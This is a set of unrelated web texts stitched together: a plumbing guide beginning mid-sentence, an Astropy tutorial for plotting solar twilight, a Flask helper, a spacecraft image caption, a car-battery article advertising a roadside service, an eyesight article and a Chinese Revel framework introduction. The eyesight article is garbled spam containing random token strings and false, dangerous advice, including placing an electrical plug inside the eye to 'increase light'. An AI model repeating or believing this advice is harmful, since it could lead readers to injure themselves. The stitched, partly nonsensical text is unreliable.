plumber to inspect your water system and upgrade where necessary. Consider installing the latest systems which can detect leaks in property. Water Pressure Water pressure is another plumbing aspect that experts should notice. Typically, in your average household, the water pressure should be under 80 psi. The situation changes when it comes to bigger structures, such as high-rises or other public buildings.  Buildings which are higher than eight stories require pumps, which transport the H2O into water tanks on the highest floor. This system is designed to ensure that water is distributed equally amongst all floors without sacrificing the level of water pressure. Submeter When it comes to large buildings like high-rises, submetering is the most practical approach. A submeter is an intricate system that allows landlords, condominium associations, landlords or other legal entities that manage buildings to charge tenants for individual consumption. Causes of Low Water Pressure in Your Home We’ve all dealt with clogged drains and pipes that are bad enough to call in a plumber. But what happens when the issue isn’t with the water draining but instead with the amount of water actually coming out? The average in-home water pressure is about 40 to 45 pounds per square inch (or PSI). If you feel like you’re dealing with low water pressure, chances are your pressure has slipped below this number. Between showering, running the dishwasher, and flushing the toilet, American families use an average of 300 gallons of water a day. We tend not to think about where that water comes from or how it comes out of our faucets. Most of us don’t know where to look if the water pressure drops. Your Water Supplier is Experiencing an Issue Before you start turning valves and knocking on pipes, ask around. If your neighbors report similar issues, chances are your low water pressure is not connected to something in your own house. Your City Has Changed Its Regulations There is also the possibility that your city has changed some of its water regulations, in which case your water supplier has no choice but to comply. The Main House Shutoff Valve Isn’t Open All the Way If you do find that you’re the only one on the block with low water pressure, it’s time to start checking around your own house for the issue. Your Plumbing Your plumbing includes all of the pipes and fixtures on your property, from the meter or valve near the street to the faucets inside your home. The following information is important to know about your home’s plumbing Main Water Valve This valve controls water flowing into your home. It is normally located where the water line enters your home through the foundation. It is a good idea to locate and mark your main water valve because you can use it to shut off the water in an emergency or when you are making plumbing improvements. It can also be turned off while the property is vacant to prevent water damage that unforeseen leaks might cause. A plumber or HVAC expert should be consulted for long-term water shut off of appliances like water heaters, etc. Water Service Lateral This is the pipe that runs underground from the meter or valve near the street to the main water valve inside the house. It is typically made of copper, plastic, or sections of both Tips For Winterizing Your Plumbing It is a good idea to locate and mark your main-line valve and check it for proper operation. This valve controls water flowing into your home. Marking the valve will allow you to quickly turn off the water if a pipe should burst or you have other water problems. You can minimize the potential for water damage by ensuring that everyone in the household knows how to shut off the water in an emergency. To make it easier, we’ve provided a main water valve tag you can print and attach to the valve. Make sure you know where the valves are for your outside spigots. That way, when freezing weather is forecast, you can easily turn off the water to the outside spigots. Shut off and drain the pipes leading to your outside faucets. Using the valves located inside your home, make sure no water is left to freeze, expand, and cause a leak in these lines. Never try to thaw frozen pipes with an open flame or torch. If you cannot maintain heat inside your home, take further precautions to prevent damage. Turn off the main water supply and drain the plumbing. If you’ll be away from home for an extended period, keep the thermostat at a reasonable temperature to protect pipes from freezing. Insulate pipes in unheated spaces. Hardware or building supply stores carry insulation designed to keep pipes in these areas from freezing. Protect Your Pipes The improper disposal of “flushable” wipes, fats, oils, and grease (FOG), and other foreign items in the sink and toilet causes expensive residential and commercial plumbing problems. Flushing unwanted or expired medication can also affect municipal sewer systems and harm the environment. The clean-up of sewer backups and the additional maintenance required to reverse the damage caused by the improper disposal of these items leads to higher utility bills, costly home plumber visits, and expensive pipe replacement. Detecting Broken Plumbing Pipes and Swimming Pool Leaks which means it’s time to get the pool and spa ready! Several things can indicate a leak, from the water level dropping by more than ¾” in one week to visual signs, including excessive amounts of dirt on the bottom of the pool, new cracks appearing in deck area, water puddles in the area around the pool, and using more chemicals than normal. What can I do myself to determine if I have a pool leak? First, determine if you have a water leak versus evaporation by performing a simple bucket test with the pump on, then again with the pump off. Day 1 (24 hours) turn ON the pump, place a bucket on the second step and fill the bucket equal to the water level in the pool, then mark the level in the bucket. If the water is less in the pool than the mark in the bucket, you may have a leak. Where Is The Water Leak In My Plumbing Pipes? How Do I Find It? Don’t let another day go by without taking care of your plumbing pipes.  Water leaks are responsible for millions of dollars in damages. Undetected water leaks can happen without anyone even realizing. Just a small pinhole leak, continuously flowing for days, months or even years wreak havoc on a property. Why Do Pipes Leak? There are many reasons why pipes leak, every day wear and tear, debris such as hair and grease can cause damage, water pressure, chemical in the water, soil conditions, and fixtures break down. The simple fact is, all pipes are susceptible to water leaks, whether you have an older home or new construction. Start Looking For Your Water Leak By Gathering Clues The easiest place to start is with your utility bill. The average family of four uses approximately 12,000 gallons of water a month or 3,000 gallons per person.  If your bill is higher than it should be, you probably have a water leak. Also, look for spikes in your bill. Learn more about your utility bill at the EPA website. Unblocking pipes and fixtures Common blockage materials Toilets and toilet pipes get blocked when people put the wrong things down the toilet. Some of the things which should never be put down the toilet are foodscraps, paper, rags, cans, bottles, grease and fat. Wastewater pipes from sinks, basins and laundry tubs can get blocked if people put food waste, especially tea leaves, hot fat and other rubbish down them. If hot fat is poured down an outlet pipe, it will set in the pipe when it cools and cause a blockage. Plumbing rods Plumbing rods are pieces of equipment used to remove most blockages from sewer pipes. However, when sewer pipes are broken plumbing rods are not effective and the damaged pipe must be replaced. Unblocking sewer pipes The larger sewer pipes have manholes set in them allowing access to the pipe. They are often about a metre underground and are large boxes which usually have walls made of concrete. The pipe opens into the box on one side and starts again on another side. Before attempting to unblock a sewer pipe it is important to remember: Before making an inspection, always wait several minutes to allow any poisonous or explosive gases to escape Never smoke while doing this work Never do this work alone Never enter a manhole without proper safety measures. It may be necessary to wear breathing equipment or to ventilate (add fresh air) to the manhole and sewer pipe. The gases in it can kill. It is always safest to check with the Water Authority, the local government EHO or supervisor before opening the lid or entering the manhole. If there are no manholes, then there will be IOs with cement or plastic caps on the pipes. There may be a concrete box around the inspection opening. Sometimes these are below the ground and are not easy to find. It may be necessary to dig to find them.
Molly Peeples (@astronomolly) recently tweeted some really cool plots from timeanddate.com that visualize local solar properties over a year from a location (e.g., twilights, solar noon, etc.), e.g.: alt text My first thought was: can we make those plots with Astropy? This post shows one way to make figures like this in Python using Astropy and Matplotlib. First, some imports: In [1]: from datetime import datetime # Third-party import astropy.coordinates as coord import astropy.units as u import astropy.time as t import matplotlib as mpl import matplotlib.pyplot as pl import matplotlib.dates as mdates import numpy as np pl.style.use('apw-notebook') %matplotlib inline import pytz This code relies on a brand new feature of the development version of Astropy that uses the Google maps API to allow you to get an EarthLocation object given any arbitrary address. For example, a fully-specified street address: In [2]: loc = coord.EarthLocation.of_address('1002 Holy Grail Court, St. Louis, MO') loc.longitude, loc.latitude Out[2]: (<Longitude -90.3064519 deg>, <Latitude 38.514261999999995 deg>) A city name: In [3]: loc = coord.EarthLocation.of_address('Parrot, ME') loc.longitude, loc.latitude Out[3]: (<Longitude -69.5539404 deg>, <Latitude 45.2550505 deg>) Or even a point of interest: In [4]: loc = coord.EarthLocation.of_address('Camelot Castle Hotel, Tintagel, UK') # (it's only a model) loc.longitude, loc.latitude Out[4]: (<Longitude -4.7554539 deg>, <Latitude 50.668217 deg>) We'll use this feature to get an EarthLocation (e.g., latitude and longitude) for any city we'd like to make a sun graph for. Next we define some more objects to define the various types of twilight. The first dictionary contains the sun altitude specifications for civil, nautical, and astronomical twilight (the range or minimum to maximum sun altitude for each). The next dictionary maps the names of the various stages of sunlight to integers that are ranked with the brightness. This will be used in plotting later on. In [5]: _twil = { 'civil': [-6., 0]*u.degree, 'nautical': [-12.,-6]*u.degree, 'astronomical': [-18., -12]*u.degree } _twil_name_map = { 'day': 0, 'civil': 1, 'nautical': 2, 'astronomical': 3, 'night': 4 } Now we can write a function to make a sun plot for a given location! At minimum, the function will need to accept an EarthLocation, which contains the latitude/longitude information, and a pytz timezone information object. We'll write the function so that, by default, it produces a plot for the entire current year by computing the solar properties for every day. But, we should let the user have some control over this -- for example, if we want lower resolution over only three months of the year starting from May 15, it should be possible to specify a custom grid of days and a start date. The full function is somewhat long, so I will break it up into chunks and explain through each chunk in succession. Skip down to the full function cell to see the whole thing. The first few lines of the plot function look at the inputs that specify the date grid over which we will compute the solar properties. The two relevant arguments are start and day_grid, and the possible combinations and specifications are: • start is not specified and day_grid is not specified: this is the default and will produce a plot with solar properties for every day in a full year starting on January 1 of the current year. • start is specified and day_grid is specified: if both are specified, we simply need to add the grid of days to the input start astropy.time.Time object. • start is specified and day_grid is not specified: if the start datetime is specified but the grid of days isn't, it uses a grid of 1 year with a spacing of 1 day. • start is not specified but day_grid is specified: assumes the start is January 1 of the current year. In [6]: def sun_info_plot1(earth_location, tz, start=None, day_grid=None, n_hour_grid=512, fig=None): if start is None and day_grid is None: # default year = datetime.now().year start = t.Time('{}-01-01'.format(year), format='iso', scale='utc') day_grid = start + np.arange(0,365+1).astype(int) * u.day elif start is not None and day_grid is not None: day_grid = start + day_grid elif start is not None and day_grid is None: day_grid = start + np.arange(0,365+1).astype(int) * u.day elif start is None and day_grid is not None: year = datetime.now().year start = t.Time('{}-01-01'.format(year), format='iso', scale='utc') day_grid = start + day_grid else: # should never reach here raise ValueError("How did I get here?") # ... Now we will loop through the days for which we will compute the solar properties, convert the local times to UTC, get the sun's position throughout the day and use our definitions of twilight to figure out at what times the conditions are met. We start by defining a 2D array: the 0th axis represents the grid of days throughout the year, and the 1st axis represents a grid of hours throughout each day when we will compute the solar properties. We now loop over each day in the year. For each day, we generate a grid of hours and convert these local times to UTC times. We then use astropy.coordinates.get_sun to get the position of the sun at each of these times, and transform these positions to the Altitude-Azimuth system using the input location on the Earth. Solar noon and midnight are computed as extrema of the altitude. For each type of twilight, we record the times at which the twilight constraints (defined above) are met by storing an integer in the 2D array twil_grid (0 corresponding to daytime, 1 for civil twilight, 2 for nautical twilight, etc. as defined above). Finally, when the sun is below -18º, we set it to night time. In [7]: def sun_info_plot2(earth_location, tz, start=None, day_grid=None, n_hour_grid=512, fig=None): # ... previous code ... twil_grid = np.zeros((len(day_grid), n_hour_grid), dtype=int) _solar_noon = [] _solar_midnight = [] for i,day in enumerate(day_grid): utc_offset = tz.utcoffset(day.datetime).total_seconds()*u.second hour_grid_loc = day + np.linspace(0, 24-1E-7, n_hour_grid)*u.hour - utc_offset loc_hr = [d.hour + d.minute/60. + d.second/3600. for d in (hour_grid_loc + utc_offset).datetime]*u.hour # get position of the Sun at all times during this day sun = coord.get_sun(hour_grid_loc) sun_altaz = sun.transform_to(coord.AltAz(location=loc)) # solar noon and midnight _solar_noon.append(loc_hr[sun_altaz.alt.argmax()]) # Sun at max altitude _solar_midnight.append(loc_hr[sun_altaz.alt.argmin()]) # Sun at min altitude # civil, nautical, astronomical twilights for key in _twil.keys(): idx = (sun_altaz.alt >= _twil[key][0]) & (sun_altaz.alt < _twil[key][1]) twil_grid[i,idx] = _twil_name_map[key] idx = (sun_altaz.alt < _twil['astronomical'][0]) twil_grid[i,idx] = _twil_name_map['night'] # convert lists of Quantity objects to Quantity arrays solar_noon = u.Quantity(_solar_noon) solar_midnight = u.Quantity(_solar_midnight) The final block of code actually generates the plot using matplotlib. This part is actually pretty easy because of how we set up the 2D array twil_grid. In anticipation of making the plot using matplotlib.pyplot.imshow, we filled twil_grid so that the values at each position in the array represent the brightness using our map from twilight name to an integer value. imshow then uses a colormap to turn these different numbers into different colors. The rest of the code is just to fancify various aspects of the plot. In [8]: def sun_info_plot3(earth_location, tz, start=None, day_grid=None, n_hour_grid=512, fig=None): # ... previous code ... if fig is None: fig,ax = pl.subplots(1,1,figsize=(15,8)) else: ax = fig.axes[0] # matplotlib date trickery: see http://matplotlib.org/api/dates_api.html xlim = mdates.date2num([day_grid.datetime.min(), day_grid.datetime.max()]).tolist() ylim = [loc_hr.value.min(), loc_hr.value.max()] # use imshow to visualize the stages of daylight ax.imshow(twil_grid.T, origin='bottom', aspect='auto', interpolation='nearest', cmap='bone_r', extent=xlim+ylim) # don't connect discontinuities with a line, which happen when solar midnight shifts # from just before 00:00 to just after. idx = np.where(np.abs(np.diff(solar_midnight.to(u.hour).value)) >= 5)[0]+1 solar_midnight = np.insert(solar_midnight, idx, np.nan) x_midnight = np.insert(mdates.date2num(day_grid.datetime), idx, np.nan) ax.plot(day_grid.datetime, solar_noon, color='#fecc5c', marker=None, linewidth=2) ax.plot(x_midnight, solar_midnight, color='#2b83ba', marker=None, linewidth=2) # assign date locator / formatter to the x-axis to get proper labels months = mdates.MonthLocator() if day_grid[0].datetime.year == day_grid[-1].datetime.year: date_fmt = mdates.DateFormatter('%b') xlabel = "{:d}".format(day_grid[0].datetime.year) else: date_fmt = mdates.DateFormatter('%b-%Y') xlabel = "" ax.xaxis.set_major_locator(months) ax.xaxis.set_major_formatter(date_fmt) ax.yaxis.set_ticks(np.arange(0,24+2,2)) ax.tick_params(axis='both', colors='#cccccc') [lbl.set_color("k") for lbl in ax.get_xticklabels() + ax.get_yticklabels()]; ax.set_ylim(-0.1,24.1) ax.set_xlabel(xlabel) fig.tight_layout() Finally, the function in its entirety: In [10]: def sun_info_plot(earth_location, tz, start=None, day_grid=None, n_hour_grid=512, fig=None): """ Visualize how solar noon, solar midnight, and twilight (civil, nautical, and astronomical) vary over a range of dates at a given location. Parameters ---------- earth_location : `~astropy.coordinates.EarthLocation` The location to produce the info for (e.g., latitude, longitude) as an Astropy `~astropy.coordinates.EarthLocation` object. tz : `~pytz.tzinfo.BaseTzInfo` The timezone of the location. start : `~astropy.time.Time`, optional day_grid : `~astropy.units.Quantity`, optional n_hour_grid : int, optional Returns ------- fig : `matplotlib.figure.Figure` """ if start is None and day_grid is None: # default year = datetime.now().year start = t.Time('{}-01-01'.format(year), format='iso', scale='utc') day_grid = start + np.arange(0,365+1).astype(int) * u.day elif start is not None and day_grid is not None: day_grid = start + day_grid elif start is not None and day_grid is None: day_grid = start + np.arange(0,365+1).astype(int) * u.day elif start is None and day_grid is not None: year = datetime.now().year start = t.Time('{}-01-01'.format(year), format='iso', scale='utc') day_grid = start + day_grid else: # should never reach here raise ValueError("How did I get here?") twil_grid = np.zeros((len(day_grid), n_hour_grid), dtype=int) _solar_noon = [] _solar_midnight = [] for i,day in enumerate(day_grid): utc_offset = tz.utcoffset(day.datetime).total_seconds()*u.second hour_grid_loc = day + np.linspace(0, 24-1E-7, n_hour_grid)*u.hour - utc_offset loc_hr = [d.hour + d.minute/60. + d.second/3600. for d in (hour_grid_loc + utc_offset).datetime]*u.hour # get position of the Sun at all times during this day sun = coord.get_sun(hour_grid_loc) sun_altaz = sun.transform_to(coord.AltAz(location=loc)) # solar noon and midnight _solar_noon.append(loc_hr[sun_altaz.alt.argmax()]) # Sun at max altitude _solar_midnight.append(loc_hr[sun_altaz.alt.argmin()]) # Sun at min altitude # civil, nautxical, astronomical twilights for key in _twil.keys(): idx = (sun_altaz.alt >= _twil[key][0]) & (sun_altaz.alt < _twil[key][1]) twil_grid[i,idx] = _twil_name_map[key] idx = (sun_altaz.alt < _twil['astronomical'][0]) twil_grid[i,idx] = _twil_name_map['night'] # convert lists of Quantity objects to Quantity arrays solar_noon = u.Quantity(_solar_noon) solar_midnight = u.Quantity(_solar_midnight) # ------------------------------------------------------------------- # Plotting # if fig is None: fig,ax = pl.subplots(1,1,figsize=(15,8)) else: ax = fig.axes[0] # matplotlib date trickery: see http://matplotlib.org/api/dates_api.html xlim = mdates.date2num([day_grid.datetime.min(), day_grid.datetime.max()]).tolist() ylim = [loc_hr.value.min(), loc_hr.value.max()] # use imshow to visualize the stages of daylight ax.imshow(twil_grid.T, origin='bottom', aspect='auto', interpolation='nearest', cmap='bone_r', extent=xlim+ylim) # don't connect discontinuities with a line, which happen when solar midnight shifts # from just before 00:00 to just after. idx = np.where(np.abs(np.diff(solar_midnight.to(u.hour).value)) >= 5)[0]+1 solar_midnight = np.insert(solar_midnight, idx, np.nan) x_midnight = np.insert(mdates.date2num(day_grid.datetime), idx, np.nan) ax.plot(day_grid.datetime, solar_noon, color='#fecc5c', marker=None, linewidth=2) ax.plot(x_midnight, solar_midnight, color='#2b83ba', marker=None, linewidth=2) # assign date locator / formatter to the x-axis to get proper labels months = mdates.MonthLocator() if day_grid[0].datetime.year == day_grid[-1].datetime.year: date_fmt = mdates.DateFormatter('%b') xlabel = "{:d}".format(day_grid[0].datetime.year) else: date_fmt = mdates.DateFormatter('%b-%Y') xlabel = "" ax.xaxis.set_major_locator(months) ax.xaxis.set_major_formatter(date_fmt) ax.yaxis.set_ticks(np.arange(0,24+2,2)) ax.tick_params(axis='both', colors='#cccccc') [lbl.set_color("k") for lbl in ax.get_xticklabels() + ax.get_yticklabels()]; ax.set_ylim(-0.1,24.1) ax.set_xlabel(xlabel) fig.tight_layout() return fig Now let's try this out on a few locations! (By the way: it'd be awesome if there were a way in Python to go from an Earth location to a timezone directly, but as far as I can tell there isn't! Instead, we have to specify the timezone name explicitly...kind of annoying). In [10]: address = 'Baltimore, MD' loc = coord.EarthLocation.of_address(address) tz = pytz.timezone('US/Eastern') fig = sun_info_plot(loc, tz) _ = fig.suptitle(address, fontsize=24, y=1.02) In [ ]: address = 'Trondheim, Norway' loc = coord.EarthLocation.of_address(address) tz = pytz.timezone('Europe/Oslo') fig = sun_info_plot(loc, tz) _ = fig.suptitle(address, fontsize=24, y=1.02) In [11]: address = 'McMurdo, Antarctica' loc = coord.EarthLocation.of_address(address) tz = pytz.timezone('Antarctica/McMurdo') fig = sun_info_plot(loc, tz) _ = fig.suptitle(address, fontsize=24, y=1.02); Download the function to produce these plots from this Gist. See the full notebook here.
from flask import abort, render_template from datetime import datetime from models.database import Speaker from shared import db def render_layout(template, **kwargs): current_time = datetime.now() return render_template(template, current_time=current_time, **kwargs) def speaker_by_name_or_number(name_or_number, event_id): if name_or_number.isnumeric(): number = int(name_or_number) speaker = Speaker.query.filter_by(number=number).first() if speaker is not None: return speaker else: speaker = Speaker("", number, event_id) db.session.add(speaker) db.session.commit() return speaker else: name = name_or_number speaker = Speaker.query.filter_by(name=name).first() if speaker is not None: return speaker else: speaker = Speaker(name, 0, event_id) db.session.add(speaker) db.session.commit() return speaker
This image was taken by the MOC at 00:52:47 UT on 14 April 1993. It contains a portion of the disk of Jupiter and the two satellites Europa and Ganymede. The planet and satellites are somewhat blurred because the MOC was still being focused (via its active focus control heaters) at this time. Like all images taken before the far-encounter images of Mars, this image was taken when Jupiter happened to pass through the MOC field of view as the spacecraft rotated in its cruise configuration, with the high-gain antenna pointed at Earth. This resulted in fairly narrow time windows when specific targets could be imaged; Jupiter was just exiting the field of view of the MOC when this image was taken.
I've left my lights on and car won't start I’ve Left My Lights On, And Car Won’t Start. Now What? Sometimes we all get a little carried away and forget to turn off our headlights or interior lights or both when leaving the car. Maybe you’re late home after a long day, and all you’re craving is the warmth of your bed. Such days happen, and you wake the next day to a car that won’t start or a car with lights on. When you’ve left the lights in your car or headlights on for a long time without the car running, it tends to drain your car’s battery. A car’s battery gets recharged when it’s on the move; that’s why you can charge your phone, listen to music, and even turn on the headlights and interior car lights. When the car is running, it replenishes its battery.  It is more likely that your car will survive overnight with the headlights or any other lights on. The moment the lights are on, it means that your lights are getting energy from your battery without recharging it. It is even unlikely that those headlights will still be on in the morning when you come back to check them.  You might have turned off your car and your lights, but other reasons could cause your lights to stay on even though you’ve turned both off, like; • Leaving your car boot a bit open • Not completely closely your car doors The car detects such issues and, as an automatic reaction, turns on the lights. When leaving your vehicle, make sure you shut all doors entirely so that you don’t come back to a car that won’t start. That can be very frustrating.  What happens if you accidentally leave your car lights on? Car batteries are not designed to keep the systems in your car running for a long time without the engine recharging them. Car batteries can only maintain their charge when you drive the car since the engine gets active and recharges it.  When you realize that you left your car lights on for way too long than you should have, check your battery to see if it’s still in the proper condition. If you have a healthy battery, you might need a jumpstart, and you can go on with your day. Leaving your car lights on will only drain your battery which could cause stalling the next day or even inability to start your car.  When the lights are on in your car and the engine isn’t running, the battery will drain as it tries to keep the lights on. Depending on your battery’s condition, this could mean buying a new one or recharging the available one.  Unfortunately for you, your car insurance won’t be able to cover the cost of your battery replacement or towing your car (if need be) because battery problems are something that falls under maintenance, and you don’t have that kind of coverage. All the financial help you need will have to come from your pocket, even though leaving the lights on was an accident.  Will my car battery die if I leave my lights on?  The life of your car’s battery depends on how long you leave it on. How full your car battery is and how new or old it is will determine just how long it can keep the lights on and still be able to start when you switch it on. If your battery is brand new and in good condition, it could last for a few hours, definitely not the whole night. But if your battery is not in good condition, it might not even last an hour.  The condition of your battery determines a lot. If your car has an old battery that you’ve probably changed for years, leaving the lights on when the engine isn’t running will mean that you might need to get your car a new battery.  On the flip side, whether you have a brand new battery in good working condition, you will come back to your car with a dead battery that will need charging. Unlike an old battery, you won’t need to buy a new battery. You could jumpstart your battery if you know how to do that or with the help of your mechanic; soon, you’ll be back in your car running errands.  Sometimes you might forget to close your car’s door all the way. Leaving it open could trigger your internal lights to stay on for the entire time you’re away from your vehicle. Even though some cars have an automatic turn-off, others don’t. You can save your battery by jump starting it, but you might kill your battery if you make this mistake several times.  How long does it take for a car battery to die with lights on? It is a bit difficult to give the exact numbers as it all depends on your battery. For some people, leaving the lights on for four hours still means that you can still come back and start your car successfully, while others can’t leave their car’s lights on for over thirty minutes without the battery giving out and needing charging or a jumpstart.  An average car battery will take between thirty to ninety minutes to drain your battery completely; this will mean that you’ll need to jumpstart or recharge your battery. But if left for several hours, your battery might not survive either. It is possible that leaving those lights on for too long could kill your battery altogether, needing you to buy new ones.  Will a dead car battery recharge itself? No. A dead car battery can’t recharge itself. To get it charged and working, you could take it out and charge it or jumpstart it with another battery or another car. There’s no type of car battery that can charge itself without external help.  Once you’ve left the lights on and now your battery is dead, not even the alternator will help recharge your battery. Another alternative to charging up your car battery is jump starting it and then running the engine for a while.  But if you can access a mechanic, they could help by using special battery chargers to recharge a battery temporarily. Your car will keep recharging the battery once you’re on the road.  There are different ways that you can recharge your battery. These include;  • Using another car’s battery: You can do this using jumper cables. Connect your dead battery to the one that’s running, and it will restart your battery within no time. When doing this, make sure you take safety precautions to prevent hurting yourself.  • Car battery charger: You can use a battery charger to connect your battery to an electricity socket and leave it there for up to twenty-four hours to charge your battery fully.  • Drive around: If your battery still has a bit of life left in it, don’t give up easily. Drive around to charge up your car’s battery. Driving around would require your battery to have a bit of life still left in it. You should take safety precautions when charging jumpstarting a battery by yourself if you haven’t done it before. These are; • Wear gloves and protect your eyes • Make sure that both batteries are of the same voltage.  • Take off any loose clothing or jewelry • Ensure that both cars aren’t touching each other.  • Ensure that the jumpstart cables are positive red.  • Don’t touch the clams while the vehicle is running. • Don’t look directly at the battery when connecting the clamps. • Ensure you don’t connect the negative clamps to any car body part. • Always use the red positive jumper cable first.  Who’s the best service when I have a dead battery? Mach1 roadside assistance is the best service to jumpstart your car anywhere, any time of the day or night. They are service-oriented, with mechanics and partners in every state. You will be charged a fair market price according to your region. Don’t be afraid of getting overcharged because that’s not what Mach1 does.  If you’ve broken down and you think it’s your battery but aren’t sure, you can order for a mechanic on their free app, and when the mechanic comes, you can add a jumpstart to your order.  With the Mach1 free app, you can access roadside assistance services without signing up to be a member. The only fees you’ll be required to pay are ones of the services you’ve ordered via the app. You can pay via the app or through a debit, credit card.  When you have a dead battery, all you need to do is download the Mach1 app, input your location, and order a dead battery service. Soon enough, help will be dispatched, and the maintenance team will inform you about how long it will take for help to arrive.  If you’re on the highway roadside, you can turn on your emergency lights and stay in your car. But if you’re not on the highway and your environment doesn’t look very crowded, you should lock yourself in the car and keep safe until help arrives.  Mach1 services are cheap as they charge according to the market price in your area and will arrive on time since they have partners in most cities and towns. For a dead battery and any other road assistance emergency service you might need, Mach1 is the best.  Conclusion  Leaving your car lights on can be an utterly accidental thing, but your battery has no idea that it was accidental and will still drain. The life of your battery will determine just how long it can keep the lights in your car on and not completely die to the point of needing replacement. A strong battery will endure draining its charge to keep the lights on, but you’ll still need a jumpstart.  As much as leaving your lights on is an accident, you shouldn’t get in the habit of it. The more your car lights stay on; the more susceptible your battery is to dying earlier and not serving you for as long as you need it to. Replacing your car’s battery very often could result in you spending too much money, which is expensive.  Always ensure you’ve locked your doors properly and trunk to prevent your lights from turning on and draining your battery. But since this is something accidental, whenever you need help with a dead battery, Mach1 services are the best roadside assistance services to contact to revive your battery.   
google-site-verification: google599ffb73897e2a9c.html AK0R2bsfY96ksj40LF3Ysjj8PYIOL4 Uncategorized A Comprehensive Guide to Improve Your Eyesight Naturally If you are interested in learning how to improve your eyesight naturally, there are some things you should know before you begin. This information can be very useful to you in order to improve your eyesight naturally. You should also make a commitment to use these natural techniques once you have improved your eyesight. The first thing you need to know about natural methods of improving your eyesight is that they cannot fix the problem permanently. They can, however, help you to improve your vision. Many people who do not suffer from this problem, take prescription glasses or contact lenses. They may have tried to use these methods and either had no successor had to spend a lot of money on eye surgeries in order to regain their vision. 16jo3gQBN07R6MGSoXAF2ozMQJbWpD Natural methods of improving your eyesight are much more affordable than all of these other methods. These methods of improving your eyesight involve a few simple and easy steps to get you through the journey of vision improvement. Your eyes need light. Without enough light coming into your eyes, it is impossible for you to see clearly. In order to see clearly, you need to get enough light into your eyes. It is necessary to use a method to improve your eyesight so that you can properly do this. One natural method of improving your eyesight is to take adequate amounts of vitamin A. Vitamin A is a necessary ingredient in order to give your eyes the amount of light they need to see. It is very important to get enough of this vitamin in order to have proper vision. Farsightedness, nearsightedness, and astigmatism are all related to the lack of enough light entering your eyes. It is very important that you increase the amount of light that you get into your eyes. There are several things that you can do to increase the amount of light that you get into your eyes. One natural method of increasing the amount of light that you get into your eyes is to do a series of exercises. You can use these exercises to help you enhance your eyesight. All you need to do to get this increased amount of light into your eyes is to place an electrical plug inside your eye. When the light from the plug comes into your eye, the amount of light coming into your eye increases. By doing this, you will increase the amount of light in your eyes. You should also try to close the eyelids, even though they may feel like a pain at first, as this will also improve your eyesight. iHbN3pz8vNzity1se2iLKn9Xig9r0R One last thing that you can do to increase the amount of light in your eyes is to look up and around your eyes. You can do this exercise by looking down and upwards. The more light that comes into your eyes, the better you will see. Learning how to improve your eyesight naturally is not something that you should shy away from. AK0R2bsfY96ksj40LF3Ysjj8PYIOL4 Leave a Reply Your email address will not be published. Required fields are marked * Back To Top
Revel 教程 阅读(579.9k) 收藏 (93) 手册简介 Revel是一个Go语言的web框架,其具有热编译,高性能,无状态,模块化等特性,非常适合做web开发。 手册说明 Go语言Web框架Revel介绍 Revel是一个Go语言的web框架,其具有热编译,高性能,无状态,模块化等特性,非常适合做web开发。这个框架源于java的 Play! Framework.清晰的MVC结构,是现在go语言Web框架中优秀的框架。 Revel框架特性 热编译 编辑, 保存, 和 刷新时,Revel自动编译代码和模板,如果代码编译错误,会给出一个 错误提示,同时捕捉 运行期错误。 全栈功能 Revel 支持: 路由, 参数解析, 验证, session/flash, 模板, 缓存, 计划任务, 测试, 国际化 等功能。 高性能 Revel 基于 Go HTTP server 构建。 这是techempower发布的 最新评测结果 。在各种不同的场景下进行了多达三到十次的请求负载测试。 框架设计 同步 Go HTTP server 对于每个请求都运行在 goroutine上。Write simple callback-free code without guilt。 无状态 Revel 提供了保持Web层无状态的可预知的扩展。例如,会话数据被存储在用户的cookie中,缓存由memcached集群提供支持。 模块化 Revel框架由被称为 过滤器 的中间件组成,它实现了几乎所有的请求处理功能。 开发者可以自由地使用自定义的过滤器,比如如自定义的路由器,用以替换Revel默认的路由过滤器。 快速开始 1、安装revel之前,先安装go环境 2、安装还需要hg和git支持 3、设置GOPATH,然后把revel下载并安装到GOPATH内 mkdir ~/gocode cd $GOPATH go get github.com/robfig/revel 4.编译revel命令行工具,revel自己封装了go的命令行工具,创建revel项目、打包发布基本都用这个工具,执行下面的命令 go build -o bin/revel github.com/robfig/revel/cmd 5.可以将编译出来的revel命令行工具加到$PATH变量中方便调用 export PATH="$PATH:$GOPATH/bin" 6.最后验证revel是否可以工作了 $ revel help ~ ~ revel! http://robfig.github.com/revel ~ usage: revel command [arguments] The commands are: run run a Revel application new create a skeleton Revel application clean clean a Revel application's temp files package package a Revel application (e.g. for deployment) Use "revel help [command]" for more information. 概要说明 本节简要介绍框架的几个主要组成部分: 路由 采用简单的声明性语法。反向路由类型安全。 控制器 组织端点到控制器。提供易用的数据绑定和表单验证。 模板 使用 Go 模板支持大规模应用. 拦截器 在一个函数运行之前或之后被调用. 控制器的方法都可以被注册拦截. 过滤器 通用的功能可以使用过滤器来实现. Revel路由 路由采用声明性语法. 所有的路由都定义在一个routes文件中。 使用简单的语法匹配路由, 并从 URI 中提取参数到控制器中. 下面是带注释的示例: # conf/routes # 这个文件定义了所有的路由 (优先级按照先后顺序) GET /login Application.Login # 匹配一个简单的路由 GET /hotels/ Hotels.Index # 匹配一个带或者不带斜线的路由 GET /hotels/:id Hotels.Show # 绑定到一个控制器参数 WS /hotels/:id/feed Hotels.Feed # WebSockets POST /hotels/:id/:action Hotels.:action # 自由绑定到一个控制器的多个方法 GET /public/*filepath Static.Serve("public") # 静态文件服务 * /:controller/:action :controller.:action # 自动捕捉所有动作,自动生成路由 反向路由以类型安全的方式生成. 例如下面的Save程序: // 展示信息. func (c Hotels) Show(id int) revel.Result { hotel := HotelById(id) return c.Render(hotel) } // 保存信息,并重定向到Hotels.Show. func (c Hotels) Save(hotel Hotel) revel.Result { // validate and save hotel return c.Redirect(routes.Hotels.Show(hotel.Id)) } 更新记录 在线笔记 App下载 App下载 扫描二维码 下载编程狮App 公众号 微信公众号 编程狮公众号
